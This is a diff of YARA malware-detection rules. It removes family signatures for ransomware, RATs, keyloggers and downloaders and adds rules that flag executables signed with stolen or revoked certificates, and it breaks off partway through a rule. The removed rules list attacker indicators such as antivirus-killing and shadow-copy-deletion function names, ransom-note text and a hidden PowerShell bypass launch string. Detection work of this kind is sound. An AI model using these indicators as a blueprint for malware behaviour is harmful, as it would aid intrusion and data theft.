-rule DITEKSHEN_MALWARE_Win_Klackring : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3Afe693728F8406054A613F6736F89E3 : FILE
 {
 	meta:
-		description = "Detects Klackring variants. Associated with ZINC / Lazarus"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7bd9a68f-d58b-5437-a28b-5a7f1a11038e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "64c4157e-2183-5f41-b938-df29e210ee80"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4461-L4475"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7431-L7443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b894e89de720affadd80966d726a44ffce75d71095b0530edb6bfddb76660c54"
+		logic_hash = "6993a13546a1eff8a4f770f224a14bffe7e3393f628337cff27cbf57ebab2a65"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%s\\%s.dll" fullword wide
-		$s2 = "cmd.exe /c move /Y %s %s" fullword wide
-		$s3 = "%s\\win32k.sys" fullword wide
-		$s4 = "NetSvcInst_Rundll32.dll" fullword ascii
-		$s5 = "Spectrum.dll" fullword ascii wide
-		$s6 = "%s\\cmd.exe" fullword wide
-		$s7 = ".?AVA5Stream@@" fullword ascii
+		thumbprint = "89528e9005a635bcee8da5539e71c5fc4f839f50"
+		hash1 = "d98bdf3508763fe0df177ef696f5bf8de7ff7c7dc68bb04a14a95ec28528c3f9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROB ALDERMAN FITNESS LIMITED" and pe.signatures [ i ] . serial == "3a:fe:69:37:28:f8:40:60:54:a6:13:f6:73:6f:89:e3" )
 }
-rule DITEKSHEN_MALWARE_Win_Comebacker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Fd7F9Cac1E9Ce71Ac757F93266E3B13 : FILE
 {
 	meta:
-		description = "Detects ComeBacker variants. Associated with ZINC / Lazarus"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d0454d09-4a15-5251-aa7a-cb00604715ca"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6021f566-e297-5af4-b692-663480091296"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4477-L4492"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7445-L7457"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d806fd199f0e8e3576ca837781c2fa06f1a09d75ea16602effb72754d8e4940"
+		logic_hash = "319f858a15f8752d7637ab7036ed89b17c501c2422769339578e685fe6a57eea"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ENGINE_get_RAND" ascii
-		$s2 = "./{IES" fullword ascii
-		$s3 = "TODO: <Company name>" fullword wide
-		$s4 = "@Microsoft Corperation. All rights reserved." fullword wide
-		$s5 = "Microsoft@Windows@Operating System" fullword wide
-		$x1 = "C:\\Windows\\System32\\rundll32.exe %s,%s %s %s" fullword ascii wide
-		$x2 = "ASN2_TYPE_new" fullword ascii wide
-		$x3 = "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\" fullword ascii wide
+		thumbprint = "af2779ceb127caa6c22232ad359888a0a71ce221"
+		hash1 = "7c28b994aeb3a85e37225cc20bae2232f97e23f115c2a409da31f353140c631e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9D\\x92\\xE5\\xB2\\x9B\\xE4\\xB8\\x89\\xE5\\x96\\x9C\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0f:d7:f9:ca:c1:e9:ce:71:ac:75:7f:93:26:6e:3b:13" )
 }
-rule DITEKSHEN_MALWARE_Win_Suncrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5Fbf16A33D26390A15F046C310030Cf0 : FILE
 {
 	meta:
-		description = "Detects SunCrypt ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1a28fcbf-1fc0-5f18-ae71-2e813ed0f958"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6c010106-141d-5121-9594-73edc872a381"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4494-L4532"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7459-L7471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "abde9bbf2577304ff059972a38e803ba17de7a1f0346efe880a710f2ad79db37"
+		logic_hash = "fc68fe14ec70de74a6dae7891dfbb82ee7974f37469cfa72d735e70e9194c405"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "-noshares" fullword wide
-		$s2 = "-nomutex" fullword wide
-		$s3 = "-noreport" fullword wide
-		$s4 = "-noservices" fullword wide
-		$s5 = "$Recycle.bin" fullword wide
-		$s6 = "YOUR_FILES_ARE_ENCRYPTED.HTML" fullword wide
-		$s7 = "\\\\?\\%c:" fullword wide
-		$s8 = "locker.exe" fullword ascii
-		$s9 = "DllRegisterServer" fullword ascii
-		$g1 = "main.EncFile" fullword ascii nocase
-		$g2 = "main.detectName" fullword ascii nocase
-		$g3 = "main.detectIP" fullword ascii nocase
-		$g4 = "main.detectDebugProc" fullword ascii nocase
-		$g5 = "main.Bypass" ascii nocase
-		$g6 = "main.allocateMemory" fullword ascii nocase
-		$g7 = "main.killAV" fullword ascii nocase
-		$g8 = "main.disableShadowCopy" fullword ascii nocase
-		$g9 = "main.(*windowsDrivesModel).LoadDrives" fullword ascii nocase
-		$g10 = "main.IsFriends" fullword ascii nocase
-		$g11 = "main.walkMsg" fullword ascii nocase
-		$g12 = "main.makeSecretMessage" fullword ascii nocase
-		$g13 = "main.stealFiles" fullword ascii nocase
-		$g14 = "main.newKey" fullword ascii nocase
-		$g15 = "main.openBrowser" fullword ascii nocase
-		$g16 = "main.killProc" fullword ascii nocase
-		$g17 = "main.selfRemove" fullword ascii nocase
-		$m1 = "<h2>\\x20Offline\\x20HowTo\\x20</h2>\\x0a\\x09\\x09\\x09\\x09<p>Copy\\x20&\\x20Paste\\x20this\\x20message\\x20to" ascii
-		$m2 = "\\x20restore\\x20your\\x20files." ascii
-		$m3 = "\\x20your\\x20documents\\x20and\\x20files\\x20encrypted" ascii
-		$m4 = "\\x20lose\\x20all\\x20of\\x20your\\x20data\\x20and\\x20files." ascii
-		$m5 = ",'/#/client/','<h2>\\x20Whats\\x20Happen" ascii
+		thumbprint = "61f422db86bbc5093b1466a281f13346f8d81792"
+		hash1 = "f45e5f160a6de454d1db21b599843637103506545183a30053d03b609f92bbdc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 6 of ( $g* ) or 3 of ( $m* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" )
 }
-rule DITEKSHEN_MALWARE_Win_Zegost : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_292Eb1133507F42E6F36C5549C189D5E : FILE
 {
 	meta:
-		description = "Detects Zegost"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cce29602-c096-53df-a99b-16f18ed43b80"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "60d3cc6e-bf58-55ae-a13b-0e22ecc8d5cd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4534-L4560"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7473-L7485"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "96727a0f5c113e5cdfe871f104553fd1c04a8f63ecbb8db7223afb71fcdd4087"
+		logic_hash = "456a09b1939d3f60e6ef735631eb681a9d15ea573552672fd14b19f60e8d8c73"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "rtvscan.exe" fullword ascii
-		$s2 = "ashDisp.exe" fullword ascii
-		$s3 = "KvMonXP.exe" fullword ascii
-		$s4 = "egui.exe" fullword ascii
-		$s5 = "avcenter.exe" fullword ascii
-		$s6 = "K7TSecurity.exe" fullword ascii
-		$s7 = "TMBMSRV.exe" fullword ascii
-		$s8 = "RavMonD.exe" fullword ascii
-		$s9 = "kxetray.exe" fullword ascii
-		$s10 = "mssecess.exe" fullword ascii
-		$s11 = "QUHLPSVC.EXE" fullword ascii
-		$s12 = "360tray.exe" fullword ascii
-		$s13 = "QQPCRTP.exe" fullword ascii
-		$s14 = "knsdtray.exe" fullword ascii
-		$s15 = "V3Svc.exe" fullword ascii
-		$s16 = "??1_Winit@std@@QAE@XZ" fullword ascii
-		$s17 = "ClearEventLogA" fullword ascii
-		$s18 = "SeShutdownPrivilege" fullword ascii
-		$s19 = "%s\\shell\\open\\command" fullword ascii
+		thumbprint = "48c32548ff651e2aac12716efb448f5583577e35"
+		hash1 = "f0b3b36086e58964bf4b9d655568ab5c7f798bd89e7a8581069e65f8189c0b79"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_GENERIC01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2Aaa455A172F7E3A2Dffb5C6B14F9C16 : FILE
 {
 	meta:
-		description = "Detects known unamed malicious executables, mostly DLLs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3c16df71-f2e2-591c-b377-7e5ed697d43f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "81c115a7-7ddf-58ba-b56e-a92652c7f217"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4562-L4575"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7487-L7499"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ddae979db5ddda772ca66a3d50e4b5479b16052ea002fd04fdbf295ce784e291"
+		logic_hash = "dd10d388e9122585c8e5b2073725f50edbc85d0ca1e94a4b034e500e0e89b608"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\wmkawe_%d.data" ascii
-		$s2 = "\\resmon.resmoncfg" ascii
-		$s3 = "ByPassUAC" fullword ascii
-		$s4 = "rundll32.exe C:\\ProgramData\\Sandboxie\\SbieMsg.dll,installsvc" fullword ascii nocase
-		$s5 = "%s\\SbieMsg." ascii
-		$s6 = "Stupid Japanese" fullword ascii
+		thumbprint = "23c91b66bd07e56e60724b0064d4fedbdb1c8913"
+		hash1 = "7852cf2dfe60b60194dae9b037298ed0a9c84fa1d850f3898751575f4377215f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM VILLAGE s.r.o." and pe.signatures [ i ] . serial == "2a:aa:45:5a:17:2f:7e:3a:2d:ff:b5:c6:b1:4f:9c:16" )
 }
-rule DITEKSHEN_MALWARE_Win_GENERIC02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Ef6392B2993A6F67578299659467Ea8 : FILE
 {
 	meta:
-		description = "Detects known unamed malicious executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d0d24e69-0e99-5766-8e8e-9cdce902fa8f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f5539ca9-d5cc-538e-8e53-3274791bfa2b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4577-L4591"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7501-L7513"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f750c871ee061ed2d5d1f68e6ac1f56b8127321cfc207e2dd1dbed9d9848ce5"
+		logic_hash = "eabfeb7abc968188276ba76cd94bd80aba340f5f920881fe13c0f7b093d65a55"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "{%s-%d-%d}" fullword wide
-		$s2 = "update" fullword wide
-		$s3 = "https://" fullword wide
-		$s4 = "http://" fullword wide
-		$s5 = "configure" fullword ascii
-		$s6 = { 8d 4f 02 e8 8c ff ff ff 8b d8 81 fb 00 dc 00 00 }
-		$s7 = { 83 c1 02 e8 3c ff ff ff 8b c8 ba ff 03 00 00 8d }
+		thumbprint = "e87d3e289ccb9f8f9caa53f2aefba102fbf4b231"
+		hash1 = "8282e30e3013280878598418b2b274cadc5e00febaa2b93cf25bb438ee6eb032"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent06 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0F007898Afcba5F8Af8Ae65D01803617 : FILE
 {
 	meta:
-		description = "Detects known downloader agent downloading encoded binaries in patches"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "00cb5184-b12d-5014-bee8-116cc72dfa47"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "1c3fddc2-3348-5f94-bf3e-5ce95b6ef009"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4593-L4610"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7515-L7527"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9188804ad0e08f3e0cd09eb8815abea14da5aa28aef9084d19108a24f49f65c7"
+		logic_hash = "260dbdd3d295ace9c478cc27061065803c159957a1eb2f7965ee2b358f02a73c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920122"
-		snort3_sid = "920119"
-
-	strings:
-		$s1 = "totallist" fullword ascii wide
-		$s2 = "LINKS_HERE" fullword wide
-		$s3 = "[SPLITTER]" fullword wide
-		$var2_1 = "DownloadWeb" fullword ascii
-		$var2_2 = "WriteByte" fullword ascii
-		$var2_3 = "MemoryStream" fullword ascii
-		$var2_4 = "DownloadString" fullword ascii
-		$var2_5 = "WebClient" fullword ascii
+		thumbprint = "5687481a453414e63e76e1135ed53f4bd0410b05"
+		hash1 = "815f1f87e2df79e3078c63b3cb1ffb7d17fd24f6c7092b8bbe1f5f8ceda5df22"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 2 of ( $var2* ) ) or ( 4 of ( $var2* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" )
 }
-rule DITEKSHEN_MALWARE_Win_PWSH_Poshkeylogger
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aa1D84779792B57F91Fe7A4Bde041942 : FILE
 {
 	meta:
-		description = "Detects PowerShell PoshKeylogger"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a816d716-caeb-5f08-9043-29db531f9e7c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "57b4741a-a23d-51aa-ad83-3a7d80368290"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4612-L4627"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7529-L7543"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "20bde87ded7e3b68bc554c4b9a6c2ef08514f0d47b6b144763927bede81ea540"
+		logic_hash = "2e57d646910c570f421939fd0d47ddee60bc38bb2ca2ba1991bf334cf8d5574b"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "::GetKeyboardState" ascii
-		$s2 = "GetAsyncKeyState(" ascii
-		$s3 = "::MapVirtualKey(" ascii
-		$s4 = "::GetAsyncKeyState" ascii
-		$s5 = "Start-Sleep" ascii
-		$s6 = "send-mailmessage" ascii
-		$s7 = "[System.IO.File]::AppendAllText($" ascii
-		$s8 = "new-object Management.Automation.PSCredential $" ascii
+		tags = "FILE"
+		thumbprint = "6c15651791ea8d91909a557eadabe3581b4d1be9"
+		importance = 20
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Fujinamarat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0690Ee21E99B1Cb3B599Bba7B9262Cdc : FILE
 {
 	meta:
-		description = "Detects FujinamaRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f6b08713-1c03-5914-b0a2-ea9164a3f2cb"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0fa2103e-c04e-5380-b4e3-6ac35f0b71d8"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4629-L4645"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7545-L7556"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "42557094afe67196442f46d76f156c09852d694bcc5f03eac51e79ad247c2fdd"
+		logic_hash = "bc2aac1bd21f80d4233af37028820a36ebd56bceed9b1318e99e75b28b9408e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920124"
-		snort3_sid = "920121"
-
-	strings:
-		$s1 = "GetAsyncKeyState" fullword ascii
-		$s2 = "HTTP/1.0" fullword wide
-		$s3 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" fullword wide
-		$s4 = "frmMain" fullword ascii
-		$s5 = "G<=>?@ABGGGGGGGGGGGGGGGGGGGGGGGGGGCDEF" fullword ascii
-		$s6 = "VBA6.DLL" fullword ascii
-		$s7 = "t_save" fullword ascii
+		thumbprint = "ff9a35ef5865024e49096672ab941b5c120657b9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xiamen Tongbu Networks Ltd." and pe.signatures [ i ] . serial == "06:90:ee:21:e9:9b:1c:b3:b5:99:bb:a7:b9:26:2c:dc" )
 }
-rule DITEKSHEN_MALWARE_Win_Phorpiex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : FILE
 {
 	meta:
-		description = "Detects Phorpiex variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e2d26c5f-939e-53e3-8730-622341d26273"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "41423db4-c475-558b-9a27-2b0ea59102ad"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4647-L4666"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7558-L7569"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c48a20aaf37d65471710181238d2c39c1cb0fc5a37b9c411e8d4dcfd7a9e26e"
+		logic_hash = "0fc85d3d01b37ff7870cade6f8e0e756593ff0b5c9eea3b687ff52985caa20dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ShEllExECutE=__\\DriveMgr.exe" fullword wide nocase
-		$s2 = "/c start __ & __\\DriveMgr.exe & exit" fullword wide nocase
-		$s3 = "%s\\autorun.inf" fullword wide
-		$s4 = "svchost." wide
-		$s5 = "%ls\\%d%d" wide
-		$s6 = "bitcoincash:" ascii
-		$s7 = "%ls:*:Enabled:%ls" fullword wide
-		$s8 = "%s\\%s\\DriveMgr.exe" fullword wide
-		$s9 = "api.wipmania.com" ascii
-		$v1_1 = "%appdata%" fullword wide
-		$v1_2 = "(iPhone;" ascii
-		$v1_3 = "/tst.php" ascii
+		thumbprint = "c58bc4370fa01d9a7772fa8c0e7c4c6c99b90561"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $v1* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" )
 }
-rule DITEKSHEN_MALWARE_Win_EXEPWSH_Dlagent : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00881573Fc67Ff7395Dde5Bccfbce5B088 : FILE
 {
 	meta:
-		description = "Detects SystemBC"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f5e7490f-806c-52d2-8f1c-9e00ab3e2780"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "10ef1865-9267-5f06-a1d5-9196b00f3dc6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4668-L4687"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7571-L7585"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6380359db1ac775cea3ebb93f7cf22a92d2f2e634c6aa724e2814c10d4ed42f5"
-		score = 60
-		quality = 30
+		logic_hash = "5b137cccecb16ad116b73fa1f9025f76846b85009fbd4962956499031d6eff35"
+		score = 75
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pwsh = "powershell" fullword ascii
-		$bitstansfer = "Start-BitsTransfer" ascii wide
-		$s1 = "GET %s HTTP/1" ascii
-		$s2 = "User-Agent:" ascii
-		$s3 = "-WindowStyle Hidden -ep bypass -file \"" fullword ascii
-		$s4 = "LdrLoadDll" fullword ascii
-		$v1 = "BEGINDATA" fullword ascii
-		$v2 = /HOST\d:/ ascii
-		$v3 = /PORT\d:/ ascii
-		$v4 = "TOR:" fullword ascii
-		$v5 = "Fwow64" fullword ascii
-		$v6 = "start" fullword ascii
+		thumbprint = "31b3a3c173c2a2d1086794bfc8d853e25e62fb46"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $pwsh and ( $bitstansfer or 2 of ( $s* ) ) ) or ( 5 of ( $v* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Hdlocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_15C5Af15Afecf1C900Cbab0Ca9165629 : FILE
 {
 	meta:
-		description = "Detects HDLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "03ada32b-6ef5-5600-954b-e9f430c6ff2d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "795fa78b-0cd4-5eb4-9d37-72b5c38e7466"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4689-L4703"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7587-L7599"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "337678a4a780947841a19c401601f1be7218276c8d4161229567dc4d6026b16a"
+		logic_hash = "cfc72a85954cb12d89a09b47b5937216a7cfee4a71ac6335a2a94faadea1f68c"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "HDLocker_" fullword ascii
-		$s2 = ".log" fullword ascii
-		$s3 = "Scripting.FileSystemObject" fullword ascii
-		$s4 = "Boot" fullword ascii
-		$s5 = "hellwdo" fullword ascii
-		$s6 = "blackmoon" fullword ascii
-		$s7 = "BlackMoon RunTime Error:" ascii
+		thumbprint = "69735ec138c555d9a0d410c450d8bcc7c222e104"
+		hash1 = "2ae575f006fc418c72a55ec5fdc26bc821aa3929114ee979b7065bf5072c488f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" )
 }
-rule DITEKSHEN_MALWARE_Win_Vovalex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_12705Fb66Bc22C68372A1C4E5Fa662E2 : FILE
 {
 	meta:
